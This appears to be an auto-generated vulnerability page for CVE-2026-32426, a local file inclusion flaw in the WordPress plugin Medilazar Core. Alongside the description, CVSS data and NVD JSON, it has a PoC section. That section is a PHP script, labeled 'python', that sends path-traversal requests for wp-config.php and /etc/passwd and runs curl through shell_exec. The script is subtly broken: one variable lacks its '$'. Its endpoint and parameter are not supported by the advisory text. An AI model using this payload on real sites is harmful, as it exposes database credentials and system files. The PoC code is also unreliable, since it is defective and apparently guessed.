Security Vulnerability Report
中文
CVE-2026-32426 CVSS 7.5 HIGH

CVE-2026-32426

Published: 2026-03-13 19:55:01
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in themelexus Medilazar Core medilazar-core allows PHP Local File Inclusion.This issue affects Medilazar Core: from n/a through < 1.4.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Medilazar Core < 1.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2026-32426 PoC - Medilazar Core Local File Inclusion * Target: WordPress Medilazar Core Plugin < 1.4.7 * Vulnerability: Unrestricted file inclusion via user-controlled parameter */ // Target URL - Replace with actual vulnerable endpoint $targetUrl = 'http://target-site.com/wp-content/plugins/medilazar-core/includes/loader.php'; // Common LFI targets in WordPress environments $fileTargets = [ '../../../../wp-config.php', '../../../../../../../etc/passwd', '../../../../etc/passwd', '../../../wp-includes/pluggable.php' ]; // Using path traversal to read sensitive files evilUrl = $targetUrl . '?action=load_template&file=' . urlencode($fileTargets[0]); // Example using curl to exploit the vulnerability $command = "curl -s '" . $evilUrl . "'"; echo "Executing: $command\n"; $output = shell_exec($command); echo "Response:\n" . $output; /** * Expected Result: * If vulnerable, the contents of wp-config.php will be displayed, * revealing database credentials and other sensitive configuration. */ ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32426", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:00.960", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in themelexus Medilazar Core medilazar-core allows PHP Local File Inclusion.This issue affects Medilazar Core: from n/a through < 1.4.7."}, {"lang": "es", "value": "Control Inadecuado del Nombre de Fichero para la Sentencia Include/Require en Programa PHP ('Inclusión Remota de Ficheros PHP') vulnerabilidad en themelexus Medilazar Core medilazar-core permite la Inclusión Local de Ficheros PHP. Este problema afecta a Medilazar Core: desde n/a hasta &lt; 1.4.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/medilazar-core/vulnerability/wordpress-medilazar-core-plugin-1-4-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}